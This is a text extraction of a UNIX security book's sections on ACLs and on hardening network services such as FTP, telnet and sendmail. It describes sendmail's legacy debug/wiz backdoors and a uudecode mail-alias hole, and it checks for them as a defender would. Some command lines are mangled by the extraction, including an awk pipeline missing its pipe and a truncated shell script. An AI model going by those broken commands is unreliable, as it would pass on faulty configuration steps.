constructed. chacl's -f option can be used to copy an ACL from one file to another file or group of files. This command applies<br />

the ACL from the file silver to all files in the current directory having the extension .dat :<br />

$ chacl -f silver *.dat<br />

Be careful with this option as it will change the ownership of target files if necessary so that the ACL exactly matches that of the<br />

specified file. If you merely want to apply a standard ACL to a set of files, you're better off creating a file containing the desired<br />

ACL, using @ characters as appropriate, and then applying it to files in this way:<br />

$ chacl -r `cat acl.metal` *.dat<br />

You can create the initial template file by using lsacl on an existing file and capturing the output.<br />

You can still use chmod to change the base entries of a file with an ACL if you include the -A option. Files with optional entries<br />

are marked by a plus sign appended to the mode string in long directory listings:<br />

-rw-------+ 1 chavez chem 8684 Jun 20 16:08 has_one<br />

-rw-r--r-- 1 chavez chem 648205 Jun 20 11:12 none_here<br />

5.1 Files 5.3 The umask<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch05_02.htm (9 of 9) [2002-04-12 10:44:09]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

Chapter 17<br />

TCP/IP Services<br />

17.3 Primary <strong>UNIX</strong> Network Services<br />

This section describes selected network services that are usually provided as part of the standard <strong>UNIX</strong> network package. It<br />

further discusses some of the major security implications of each of these services.<br />

Every network service carries both known and unknown security risks. Some services have relatively small known risks, while<br />

others have substantial ones. And with every network service there is the possibility that a security flaw in the protocol or the<br />

server will be discovered at some point in the future. Thus, a conservative security policy would remove every service for which<br />

there is no demonstrated need.<br />

If you think that the risk of a service outweighs its benefit, then you can disable the service simply by placing a hash mark (#) at<br />

the beginning of the lines in the /etc/rc* file(s) or the /etc/inetd.conf file that cause the server program to be executed. This will<br />

serve to comment out those lines. Of course, if you turn off a needed service, people who wish to use it are likely to complain!<br />

Remember, too, that disabling the ability to receive network connections does not prevent people on your computer from initiating<br />

outbound network connections.<br />

Note that the inetd program may not take notice of any changes to its configuration until it is restarted or sent a signal (usually the<br />

HUP signal; consult the inetd man page for your system). Changes in the /etc/rc* file(s) may not take effect until you change the<br />

run level or restart your system. Thus, if you disable a service, the change may not cause a currently running invocation of the<br />

server to terminate - you may need to take some other action before you can verify that you have properly disabled the service.<br />

We recommend that you save a copy of any configuration files before you begin to edit them. That way, if you make a mistake or<br />

if something doesn't work as expected, you can roll back to an earlier version of the files to determine what happened. You might<br />

consider using the RCS or SCCS revision-control systems to manage these files. These systems allow you to put date stamps and<br />

comments on each set of changes, for future reference. Such markings may also be useful for comparison purposes if you believe<br />

that the files have been changed by an intruder, although this isn't a particularly strong form of detection.<br />

17.3.1 systat (TCP Port 11)<br />

The systat service is designed to provide status information about your computer to other computers on the network.<br />

Many sites have configured their /etc/inetd.conffile so that connections to TCP port 11 are answered with the output of the who or<br />

w command. You can verify if your system is configured in this manner with the telnet command:<br />

unix% telnet media.mit.edu 11<br />

Trying 18.85.0.2... Connected to media.mit.edu.<br />

Escape character is '^]'.<br />

lieber ttyp0 Aug 12 19:01 (liebernardo.medi)<br />

cahn ttyp1 Aug 13 14:47 (remedios:0.0)<br />

foner ttyp2 Aug 11 16:25 (18.85.3.35:0.2)<br />

jrs ttyp3 Aug 13 17:12 (pu.media.mit.edu)<br />

ereidell ttyp4 Aug 14 08:47 (ISAAC.MIT.EDU)<br />

felice ttyp5 Aug 14 09:40 (gaudy.media.mit.)<br />

das ttyp6 Aug 10 19:00 (18.85.4.207:0.0)<br />

...<br />

Although providing this information is certainly a friendly thing to do, usernames, login times, and origination hosts can be used<br />

to target specific attacks against your system. We therefore recommend against running this service.<br />

To disable the service, simply comment or remove the line beginning with the word "systat" from your /etc/inetd.conffile. You can<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (1 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

also verify that the service has been disabled by using the telnet command:<br />

unix% telnet media.mit.edu 11<br />

Trying 18.85.0.2... Connection refused.<br />

unix%<br />

17.3.2 (FTP) File Transfer Protocol (TCP Ports 20 and 21)<br />

The File Transfer Protocol (FTP) allows you to transfer complete files between systems. Its <strong>UNIX</strong> implementation consists of two<br />

programs: ftp is the client program; /etc/ftpd (sometimes called /usr/etc/in.ftpd) is the server. TCP port 21 is used for sending<br />

commands; port 20 is occasionally used for the data stream, although it is more common for the client and server to mutually<br />

negotiate a set of port numbers greater than 1024.<br />

When you use FTP to contact a remote machine, the remote computer requires that you log in by providing your username and<br />

password; FTP logins are usually recorded on the remote machine in the /usr/adm/wtmp file. Because the passwords typed to FTP<br />

are transmitted unencrypted over the network, they can be intercepted (as with the telnet and rexec commands); for this reason,<br />

some sites may wish to disable the ftp and ftpd programs, or modify them to use alternative authentication protocols.<br />

17.3.2.1 Using anonymous FTP<br />

FTP can be set up for anonymous access, which allows people on the network who do not have an account on your machine to<br />

deposit or retrieve files from a special directory. Many institutions use anonymous FTP as a low-cost method to distribute<br />

software and databases to the public.<br />

To use anonymous FTP, simply specify ftp [6] as your username, and your real identity - your email address - as the password.<br />

[6] Some older servers require that you specify "anonymous" for anonymous FTP; most servers accept either<br />

username.<br />

% ftp athena-dist.mit.edu<br />

Connected to AENEAS.MIT.EDU.<br />

220 aeneas FTP server (Version 4.136 Mon Oct 31 23:18:38 EST 1988) ready.<br />

Name (athena-dist.mit.edu:fred): ftp<br />

331 Guest login ok, send ident as password.<br />

password: Rachel@ora.com<br />

230 Guest login ok, access restrictions apply.<br />

ftp><br />

Increasingly, systems on the <strong>Internet</strong> require that you specify an email address as your "password." However, few of these systems<br />

verify that the email address you type is your actual email address.<br />

17.3.2.2 Passive vs. active FTP<br />

The FTP protocol supports two modes of operations, active (often called normal) and passive. These modes determine whether the<br />

FTP server or the client initiates the TCP connections that are used to send information from the server to the host.<br />

Active mode is the default. In active mode, the server opens a connection to the client, as illustrated in Figure 17.1. Active mode<br />

complicates the construction of firewalls, because the firewall must anticipate the connection from the FTP server back to the FTP<br />

client program and permit that connection through the firewall.<br />

Figure 17.1: Active-mode FTP connection<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (2 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

Figure 17.2: Passive-mode FTP connection<br />

17.3.2.3 FTP passive mode<br />

Under normal circumstances, the FTP server initiates the data connection back to the FTP client. Many FTP servers and clients<br />

support an alternative mode of operation called passive mode. In passive mode, the FTP client initiates the connection that the<br />

server uses to send data back to client. Passive mode is shown in Figure 17.2. Passive mode is desirable, because it simplifies the<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (3 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

task of building a firewall: the firewall simply allows internal connections to pass through to the outside world, but it does not<br />

need to allow outside connections to come back in. Not all FTP clients support passive mode, but many do, including the FTP<br />

clients that are built in to most popular WWW browsers. If your software does not yet include it, you should upgrade to software<br />

that does.<br />

17.3.2.4 Setting up an FTP server<br />

If you wish to provide FTP service, you have three choices for FTP servers:<br />

1.<br />

2.<br />

3.<br />

You can use the standard <strong>UNIX</strong> ftpd that comes with your system. Depending on your <strong>UNIX</strong> vendor, this version may or<br />

may not be secure and bug free. Over the years, many security problems have been found with ftpd. Some vendors have<br />

been quick to implement the necessary bug fixes; others have not.<br />

You can run wuftpd, an excellent FTP server originally written at Washington University in Saint Louis. The wuftpd server<br />

has many useful options that allow you to create different categories of FTP users, allow you to set limits on the number of<br />

simultaneous file transfers, and allow you to save network bandwidth by automatically compressing and archiving files as<br />

they are transferred. Unfortunately, the program itself is quite complex, is somewhat difficult to configure, and has had<br />

security problems in the past. Nevertheless, wuftpd is the FTP server of choice for many major archive sites.<br />

If you only want to provide anonymous FTP access, you can use one of several stripped-down, minimal implementations of<br />

FTP servers. One such version is the aftpd server, written by Marcus Ranum when he was at Trusted Information Systems.<br />

The aftp server is designed to be as simple as possible so as to minimize potential security problems; therefore, it has far<br />

fewer features and options than other servers. In particular, it will only serve files in anonymous transfer mode. We suggest<br />

that you consider getting a copy of aftp (or something like it) if you only want to offer anonymous access.[7]<br />

[7] This is not the same FTP server as the one included in the TIS Firewall Toolkit. aftp is available from the<br />

TIS FTP site, ftp.tis.com.<br />

All of these servers are started by the inetd daemon, and thus require an entry in the /etc/inetd.conffile. You can either have the<br />

FTP server run directly or run through a wrapper such as tcpwrapper. Our discussion of FTP services in the following sections<br />

applies to the standard <strong>UNIX</strong> ftpd server.<br />

17.3.2.5 Restricting FTP with the standard <strong>UNIX</strong> FTP server<br />

The /etc/ftpusers file contains a list of the accounts that are not allowed to use FTP to transfer files. This file should contain all<br />

accounts that do not belong to actual human beings:<br />

# cat /etc/ftpusers<br />

root<br />

uucp<br />

news<br />

bin<br />

ingres<br />

nobody<br />

daemon<br />

In this example, we specifically block access to the root, uucp, news, bin, and other accounts so that attackers on the <strong>Internet</strong> will<br />

not be able to break into these accounts using the FTP program. Blocking system accounts in this manner also prevents the system<br />

manager from transferring files to these accounts using FTP, which is a risk because the passwords can be intercepted with a<br />

packet sniffer.<br />

Additionally, most versions of FTP will not allow a user to transfer files if the account's shell, as given in the /etc/passwd file of<br />

the system, is not also listed in the /etc/shells[8] file. This is to prevent users who have had accounts disabled, or who are using<br />

restricted shells, from using FTP. You should test this feature with your own server to determine if it works correctly.<br />

[8] Note that /etc/shells is also used by chfn as a list of allowable shells to change to.<br />

17.3.2.6 Setting up anonymous FTP with the standard <strong>UNIX</strong> FTP server<br />

Setting up anonymous FTP on a server is relatively easy, but you must do it correctly, because you are potentially giving access to<br />

your system to everybody on the network.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (4 of 28) [2002-04-12 10:44:12]


To set up anonymous FTP, you must create a special account with the name ftp. For example:<br />

ftp:*:400:400:Anonymous FTP:/var/spool/ftp:/bin/false<br />

Files that are available by anonymous FTP will be placed in the ftp home directory; you should therefore put the directory in a<br />

special place, such as /var/spool/ftp.<br />

When it is used for anonymous FTP, ftpd uses the chroot() function call to change the root of the perceived filesystem to the home<br />

directory of the ftp account. For this reason, you must set up that account's home directory as a mini filesystem. Three directories<br />

go into this mini filesystem:<br />

bin<br />

etc<br />

pub<br />

[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

This directory holds a copy of the /bin/ls program, which ftpd uses to list files. If your system uses dynamic linking and<br />

shared libraries, you must either install programs that are statically linked or install the dynamic libraries in the appropriate<br />

directory (for example, /var/spool/ftp/lib).<br />

This directory holds a version of the /etc/passwd and /etc/group files, which are put there so the /bin/ls command will print<br />

usernames and groupnames when it lists files. Replace the encrypted passwords in this file with asterisks. Some<br />

security-conscious sites may wish to delete some or all account names from the passwd file; the only one that needs to be<br />

present is ftp. (Actually, if neither file exists, most FTP servers will still work normally.)<br />

This directory, short for public, holds the files that are actually made available for anonymous FTP transfer. You can have<br />

as many subdirectories as you wish in the pub directory.<br />

Be sure to place the actual files in these directories, rather than using symbolic links pointing to other places on your system.<br />

Because the ftpd program uses the chroot()system call, symbolic links may not behave properly with anonymous FTP. In general,<br />

symbolic links to inside your chroot area will work, and they are commonly used on anonymous FTP sites. However, any<br />

symbolic link which points outside the chroot area or is an absolute symbolic link will not work.<br />

Now execute the following commands as the superuser. We assume that you've already created ~ftp.<br />

# mkdir ~ftp/bin ~ftp/etc ~ftp/pub Create needed directories.<br />

Set up ~ftp/bin:<br />

# chown root ~ftp/bin/ls Make sure root owns<br />

the directory .<br />

# cp /bin/ls ~ftp/bin Make a copy of the ls program.<br />

# chmod 111 ~ftp/bin/ls Make sure ls can't be changed.<br />

# chmod 111 ~ftp/bin Make directory execute only.<br />

# chown root ~ftp/bin Make sure root owns the directory.<br />

Set up ~ftp/etc:<br />

# cat-passwd awk -F: '{printf "%s:*:%s:%s::\n",$1,$2,$3}' \<br />

> ~ftp/etc/passwd<br />

Make a copy of /etc/passwd with<br />

all passwords changed to asterisks.<br />

# awk -F: '{printf "%s::%s:%s\n",$1,$3,$4}' /etc/group > ~ftp/etc/group<br />

Make a copy of /etc/group.<br />

# chmod 444 ~ftp/etc/* Make sure files in etc are not writable.<br />

# chmod 111 ~ftp/etc Make directory execute-only.<br />

# chown root ~ftp/etc Make sure root owns the directory.<br />

Alternatively, note that most ftp servers will work fine if the only entries in the passwd file are for root and ftp, and the only entry<br />

in the group file is for group ftp. The only side-effect is that files left in the ftp directories will show numeric owner and groups<br />

when clients do a directory listing. The advantage to having a trimmed file is that outsiders cannot gain any clues as to your<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (5 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

system's user population if they should obtain a copy of the file.<br />

Some systems will require you to install dynamic libraries and even device files to make the FTP server's file list command work.<br />

This is particularly a problem on Solaris systems. In general, the fewer files accessed in the anonymous FTP area, the harder the<br />

system will be to compromise.<br />

Set up ~ftp/pub:<br />

# chown root.wheel ~ftp/pub Make sure root owns the directory.<br />

# chmod 555 ~ftp/pub Make directory writable by nobody.[9]<br />

(See warning.)<br />

And finally, secure the ~ftp directory:<br />

# chmod 555 ~ftp<br />

# chown root ~ftp<br />

NOTE: Note that some man pages from some vendors state that the ~ftp directory should be owned by user ftp. This<br />

practice is dangerous! If user ftp owns the home directory, anonymous users can change the FTP environment, can<br />

delete or create new files at will, and can run any program that they choose. They can also create .rhosts files to gain<br />

direct access to your system!<br />

You should also set up a mail alias for the ftp user, so that mail sent to ftp is delivered to one of your system administrators.<br />

Don't Become an FTP-Software Pirate Repository!<br />

Years ago, organizations that ran FTP servers would routinely create an "open" directory on their servers so that users on the<br />

network could leave files for users of the system. Unfortunately, software pirates soon started using those directories as<br />

repositories for illegally copied programs, files of stolen passwords, and pornographic pictures. Collectively, this information is<br />

sometimes known as warez, although that name is usually reserved for the pirated software alone. Today, if you have a directory<br />

on an anonymous FTP server that is writable by the FTP user, the odds are quite high that it eventually will be discovered and<br />

used in this manner.<br />

Of course, some sites still wish to create "depository" directories on their FTP servers, so that users on the network can leave files<br />

for users of their system. The correct way to do so is to create a depository that is carefully controlled and automatically emptied:<br />

1.<br />

2.<br />

3.<br />

4.<br />

Create a directory that is writable, but not readable, by the ftp user. The easiest way to do so is to make the directory owned<br />

by root, and give it a mode of 1733. In this manner, files can be left for users, but other users who connect to your system<br />

using anonymous FTP will not be able to list the content of the directory.[10]<br />

[10] If you are using the wu archive server, you can configure it so that uploaded files are uploaded in mode<br />

004, so that they cannot be read by another client. If you are writing your own server, this is a good idea to<br />

include in your code.<br />

Put a file quota on the ftp user, to limit the total number of bytes that can be received. (Alternatively, locate the anonymous<br />

FTP directory on an isolated partition.)<br />

Create a shell script that automatically moves any files left in the depository that are more than 15 (or 30 or 60) minutes old<br />

into another directory that is not accessible by the anonymous FTP user. You may also wish to have your program send you<br />

email when files are received.<br />

Place an entry in your /usr/lib/crontab file so this script runs automatically every 15-30 minutes.<br />

17.3.2.7 Allowing only FTP access<br />

Sometimes, you may wish to give people permission to FTP files to and from your computer, but you may not want to give them<br />

permission to actually log in. One simple way to accomplish this goal is to set up the person's account with a special shell, such as<br />

/bin/ftponly. Follow these directions:[11]<br />

1.<br />

[11] If you are using wuftpd, note that there is a feature which allows a similar configuration.<br />

Create a shell script /bin/ftponly, which prints a polite error message if the user attempts to log into his account. Here is an<br />

example:<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (6 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

2.<br />

3.<br />

#!/bin/sh<br />

/bin/cat


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

●<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Although finding the telephone number of a computer's modems can be difficult, one can easily find out the address of a<br />

computer on the <strong>Internet</strong>. Few computer centers publish the telephone numbers of their computer's modems, but a<br />

computer's <strong>Internet</strong> address can be easily determined from its hostname. Although this availability makes access easier for<br />

authorized users, it also makes access easier for attackers.<br />

Because connecting to a computer via Telnet is significantly faster than calling the computer with a modem, an attacker can<br />

try to guess more passwords in a given amount of time.<br />

As long distance calls cost the caller money, few attackers try to break into computers outside their local calling area. On<br />

the other hand, there is usually no incremental cost associated with using Telnet to break into distant machines. Somebody<br />

trying to log into your computer with a stolen password might be across the street, or they might be on the other side of the<br />

globe.<br />

Because the <strong>Internet</strong> lacks a sophisticated technology for tracing calls (often available on telephone networks), the <strong>Internet</strong><br />

gives attackers the added protection of near anonymity.<br />

Many modems ring or produce other audible sounds when they receive incoming calls. Telnet connections are silent, and<br />

thus less likely to attract outside attention.<br />

A network connection allows an attacker to gain much more information about a target machine, which can be used to<br />

locate additional points of vulnerability.<br />

Telnet is a useful service. To make it safer, you should avoid using reusable passwords. You can also assign users different<br />

passwords on different computers, so that if one account is compromised, others will not be.<br />

17.3.4 Simple Mail Transfer Protocol (SMTP) (TCP Port 25)<br />

The Simple Mail Transfer Protocol (SMTP) is an <strong>Internet</strong> standard for transferring electronic mail between computers. The <strong>UNIX</strong><br />

program /usr/lib/sendmail usually implements both the client side and the server side of the protocol, and seems to be the<br />

predominant software used in <strong>UNIX</strong> email systems. Using sendmail, mail can be:<br />

●<br />

●<br />

●<br />

●<br />

●<br />

Delivered to individual users<br />

Distributed to mailing lists (of many users)<br />

Sent automatically to another machine<br />

Appended to files<br />

Provided as standard input to programs<br />

A legitimate mail address can be a username or an entry in the alias database. The aliases are located in the aliases file, usually in<br />

the /usr/lib, /etc, /etc/mail, or /etc/sendmail directories.<br />

The sendmail program also allows individual users to set up an alias for their accounts by placing a file with the name .forward in<br />

their home directories.<br />

Another file, sendmail.cf, controls sendmail's configuration. The sendmail.cf file can also be found in various directories,<br />

depending on the version in use and the configuration options chosen.<br />

NOTE: The sendmail program is only one of many different systems for delivering email over the <strong>Internet</strong>. Others<br />

include smail, MMDF, and PMDF. However, Berkeley's sendmail is by far the most common mailer on the <strong>Internet</strong>.<br />

It also seems to be the mailer that is the most plagued with security problems. Whether these problems are because<br />

the design of sendmail is fundamentally flawed, because the coding of sendmail is particularly sloppy, or simply<br />

because more people are looking for flaws in sendmail than in any other program remains an open question.<br />

17.3.4.1 sendmail and security<br />

sendmail has been the source of numerous security breaches on <strong>UNIX</strong> systems. For example:<br />

●<br />

Early versions of sendmail allowed mail to be sent directly to any file on the system, including files like /etc/passwd.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (8 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

●<br />

●<br />

●<br />

●<br />

●<br />

sendmail supports a " wizard's password," set in the configuration file, that can be used to get a shell on a remote system<br />

without logging in.<br />

sendmail allows trusted users, who are permitted to forge mail that is delivered to the local machine.<br />

sendmail can be compiled in "debug mode," a mode that in the past has been used to allow outsiders unrestricted access to<br />

the system sendmail is running on.<br />

sendmail used to accept mail with a program as the recipient, thus allowing remote users to invoke shells and other<br />

programs on the destination host.<br />

sendmail has done a poor job of validating its arguments, thus allowing users to overwrite arbitrary locations in memory, or<br />

provide input that results in very bad side effects.<br />

One of the main reasons for sendmail's problems is its all-in-one design. The program is extremely complicated, runs as superuser,<br />

freely accepts connections from any computer on the <strong>Internet</strong>, and has a rich command language. We are not surprised that the<br />

program has been plagued with problems, although it seems to have had more than its share.<br />

Fortunately, there are alternatives. Instead of having a large all-in-one program receive messages from the <strong>Internet</strong> and then<br />

deliver the mail, you could split this functionality into two different programs. The Firewall Toolkit from Trusted Information<br />

Systems contains a program called smap that does exactly this. Even if you do not have a firewall, you may wish to use smap for<br />

accepting SMTP connections from outside sites. For instructions on how to do this, see "Installing the TIS smap/smapd sendmail<br />

Wrapper" in Chapter 22.<br />

What's My sendmail Version?<br />

If you are using the version of sendmail that was supplied with your operating system, then you may have difficulty figuring out<br />

which version of sendmail you are actually running. Your sendmail program should print its version number when you telnet to it<br />

(port 25). Beware: if sendmail does not print a version number, there is no easy way to determine what version number you have.<br />

One way that you can determine your sendmail version is to download a new version and install it yourself.<br />

You can get the current version of sendmail from the following locations:<br />

ftp://ftp.cs.berkeley.edu/ucb/sendmail<br />

ftp://info.cert.org/pub/tools/sendmail/<br />

ftp://auscert.org.au/pub/mirrors/ftp.cs.berkeley.edu/ucb/sendmail<br />

Some vendors make proprietary changes to the sendmail program, so you may not be able to use Berkeley's unmodified version on<br />

your system. (For example, Berkeley's unmodified sendmail will not read mail aliases from systems using Sun Microsystem's<br />

NIS+ network name service.) In these cases, your only solution is to speak with your vendor.<br />

17.3.4.2 Using sendmail to receive email<br />

If you must run sendmail to receive electronic mail, you should take extra measures to protect your system's security.<br />

1.<br />

Make sure that your sendmail program does not support the debug, wiz, or kill commands. You can test your sendmail with<br />

the following command sequence:<br />

% telnet localhost smtp<br />

Connected to localhost.<br />

Escape character is "^]".<br />

220 prose.cambridge.ma.us Sendmail 5.52 ready at Mon, 2 Jul 90<br />

15:57:29 EDT<br />

wiz<br />

500 Command unrecognized<br />

debug<br />

500 Command unrecognized<br />

kill<br />

500 Command unrecognized<br />

quit<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (9 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

2.<br />

3.<br />

4.<br />

5.<br />

221 prose.cambridge.ma.us<br />

closing connection<br />

Connection closed by foreign host<br />

%<br />

The command telnet localhost smtp opens up a TCP connection between your terminal and the smtp part of your local<br />

computer (which always has the alias localhost). You are then able to type commands to your sendmail's command<br />

interpreter. If your sendmail responds to the debug or wiz command with any of the following messages - or any message<br />

other than "command unrecognized" - replace the version of sendmail that you are running (but see #4 below):<br />

200 Debug set<br />

200 Mother is dead<br />

500 Can't kill Mom<br />

200 Please pass, oh mighty wizard<br />

500 You are no wizard!<br />

Delete the " decode" aliases from the alias file. The decode alias is a single line that looks like this:<br />

decode: "|/usr/bin/uudecode"<br />

The decode alias allows mail to be sent directly to the uudecode program. This ability has been shown to be a security hole.<br />

Examine carefully every alias that points to a file or program instead of a user account. Remember to run newaliases after<br />

changing the aliases file.<br />

Make sure that your aliases file is protected so that it cannot be modified by people who are not system administrators.<br />

Otherwise, people might add new aliases that run programs, redirect email for system administrators, or play other games. If<br />

your version of sendmail creates aliases.dir and aliases.pag dbm files, those files should also be protected.<br />

Make sure that the "wizard" password is disabled in the sendmail.cf file. If it is not, then a person who knows the wizard<br />

password can connect to your computer's sendmail daemon and start up a shell without logging in! If this feature is enabled<br />

in your version of sendmail, you will note that the wizard password is a line that begins with the letters OW (uppercase O,<br />

uppercase W). For example:<br />

# Let the wizard do what she wants<br />

OWsitrVlWxktZ67<br />

If you find a line like this, change it to disallow the wizard password:<br />

# Disallow wizard password:<br />

OW*<br />

Make sure that you have the most recent version of sendmail installed on your computer. Monitor the CERT mailing list for<br />

problems with sendmail and be prepared to upgrade as soon as vulnerabilities are posted.<br />

Stamp Out Phantom Mail!<br />

The <strong>UNIX</strong> operating system uses accounts without corresponding real users to perform many system functions. Examples of these<br />

accounts include uucp, news, and root. Unfortunately, the mail system will happily receive email for these users.<br />

Email delivered to one of these accounts normally goes only to a mail file. There, it resides in your /var/spool/mail directory until<br />

it is finally read. On some systems, there is mail waiting for users with the names news or ingres that is more than five years old.<br />

Is this a problem? Absolutely:<br />

●<br />

●<br />

These mail files can grow to be megabytes long, consuming valuable system resources.<br />

Many programs that run autonomously will send mail to an address such as news or uucp when they encounter a problem. If<br />

this mail is not monitored by the system administrator, problems can go undiagnosed.<br />

You can avoid the problem of phantom mail by creating mail aliases for all of your system, nonuser accounts. To make things<br />

easy for future system administrators, you should put these aliases at the beginning of your aliases file. For example:<br />

#<br />

# System aliases<br />

#<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (10 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

root: simsong<br />

Postmaster: root<br />

usenet: root<br />

news: root<br />

agent: root<br />

sybase: root<br />

MAILER-DAEMON: postmaster<br />

NOTE: When security flaws are announced, potential intruders are often much quicker to attack than system<br />

administrators are to upgrade. We advise you to upgrade as quickly as possible. Sites have been attacked within six<br />

hours of the release of a CERT advisory.<br />

17.3.4.3 Improving the security of Berkeley sendmail V8<br />

If you are intent on using Berkeley sendmail for your mail server, you can still improve your security by using sendmail Version<br />

8. If you are not running sendmail Version 8, then you are probably running Version 5; Versions 6 and 7 did not make it out the<br />

door.<br />

NOTE: Be sure that you track the current version of sendmail, and obtain new versions as necessary. New<br />

security-related bugs are (seemingly) constantly being discovered in sendmail. If you do not keep up, your site may<br />

be compromised!<br />

There are well-known vulnerabilities, with exploit scripts, in most older versions of sendmail, including versions provided by<br />

many vendors. Besides containing numerous bug fixes over previous versions of sendmail, Version 8 offers a variety of "security<br />

options" that can be enabled by inserting a statement in your sendmail.cf configuration file. Many of these options are designed to<br />

control the release of information about your internal organization on the <strong>Internet</strong>.[13] These options are summarized in Table<br />

17.1:<br />

[13] We recommend that you read the security chapter in Sendmail by Bryan Costales et al. (<strong>O'Reilly</strong> & Associates,<br />

1993) for additional information.<br />

Table 17.1: <strong>Sec</strong>urity Options in Version 8 Sendmail<br />

Option Effect Purpose<br />

novrfy Disables VRFY command. VRFY can be used by outsiders to determine the names of valid users;<br />

use novrfy to disable this command.<br />

noexpn Disables EXPN command. EXPN reveals the actual delivery addresses of mail aliases and mailing<br />

lists; noexpn disables this command.<br />

needmailhelo Requires HELO before a MAIL command. Refuses mail unless the sending site has properly identified itself.<br />

needvrfyhelo Requires HELO before VRFY command. Allows the use of the VRFY command, but only after the network user<br />

has identified himself.<br />

needexpnhelo Requires HELO before EXPN command. Allows use of the EXPN command, but only after the network user has<br />

identified himself.<br />

restrictmailq Restricts use of mailq command. If set, allows only users who belong to the group that owns the mail<br />

queue directory to view the mail queue. This restriction can prevent<br />

others from monitoring mail that is exchanged between your computer<br />

and the outside world.<br />

You can increase the logging level of sendmail to level 9 by inserting the line "OL9" in your sendmail.cf file, and we recommend<br />

that you do so; higher levels are used for debugging and do not serve any obvious security purpose. This will log lots of<br />

interesting information to syslog. Be sure that your syslog.conf file is configured so that this information is written to a reasonable<br />

place, and be sure to check the logs.<br />

There have been a number of problems with addresses that send mail to programs. This should be disabled, if not needed, by<br />

setting the progmailer to a program such as /bin/false. If you do need progmailer functionality, use smrsh (bundled with 8.7.x).<br />

Here is an example of when you might use the security options. Suppose that you have a company-wide alias such as all or<br />

marketing, and that you wish to prevent outsiders (such as recruiters) from learning the email addresses of people on these mailing<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch17_03.htm (11 of 28) [2002-04-12 10:44:12]


[Chapter 17] 17.3 Primary <strong>UNIX</strong> Network Services<br />

lists. At the same time, you may wish to prevent outsiders from learning the names of valid accounts on your system, to avoid<br />

accepting email from sites that do not properly identify themselves, and to prevent employees from spying on another's email<br />

correspondence. In this case, you would insert the following line into your sendmail.cf file; note that the "O" is required at the<br />

beginning of the Option line.<br />

Onovrfy,noexpn,needmailhelo,restrictmailq<br />

We recommend that you use this setting unless you have a specific reason for divulging your internal account information to the<br />

<strong>Internet</strong> at large. Be aware, though, that sendmail's VERB (verbose) command will still be active, which may still be used by<br />

attackers to gain insight into your vulnerabilities. The VERB command cannot be easily disabled.<br />

Note that if you disable the finger command and also turn off the VRFY option in your mailer, you can make it difficult for<br />

someone outside your site to determine a valid email address for a user that may be at your site. You should probably set up some<br />

form of modified finger service in this case to respond with information about how to obtain a valid email address.<br />

17.3.5 TACACS (UDP Port 49)<br />

TACACS is the TAC Access Control Server protocol. It is a protocol that is used to authenticate logins to terminal servers.<br />

TACACS defines a set of packet types that can be sent from the terminal server to an authentication server. The LOGIN packet is<br />

a query indicating that a user wishes to log in to the terminal server. The TACACS server examines the username and the<br />

password that are present in the LOGIN packet and sends back an ANSWER packet that either accepts the login or rejects it.<br />

The TACACS and XTACACS (Extended TACACS) support a variety of additional packets, which allow the terminal server to<br />

notify the host when users connect, hang up, log in, log out, and switch into SLIP mode.<br />

Passwords are not encrypted with TACACS. Thus, they are susceptible to packet sniffing.<br />

17.3.6 Domain Name System (DNS) (TCP and UDP Port 53)<br />

The Domain Name System (DNS) is a distributed database that is used so that computers may determine IP addresses from<br />

hostnames, determine where to deliver mail within an organization, and determine a hostname from an IP address. The process of<br />

using this distributed system is called resolving.<br />

When DNS looks up a hostname (or other information), the computer performing the lookup contacts one or more nameservers,<br />

seeking records that match the hostname that is currently being resolved.[14] One or more nameserver records can be returned in<br />

response to a name lookup. Table 17.2 lists some of the kinds of records that are supported:<br />

[14] Most <strong>UNIX</strong> DNS implementations use a file called /etc/resolv.conf to specify the IP addresses of the<br />

nameservers that should be queried. Further, a default domain can be specified.<br />

Table 17.2: DNS-supported Record Types<br />

Record Type Purpose<br />

A Authoritative address. For the IN domain, this is an IP address.<br />

AAAA IP version 6 authoritative address.<br />

CNAME Canonical name of an alias for a host.<br />

PTR Pointer record; maps IP addresses to a hostname (for IP host).<br />

MX Mail exchange; specifies a different computer that should actually receive mail destined for this host.<br />

For example, using DNS, a computer on the <strong>Internet</strong> might look up the name www.cs.purdue.edu and receive an A record<br />

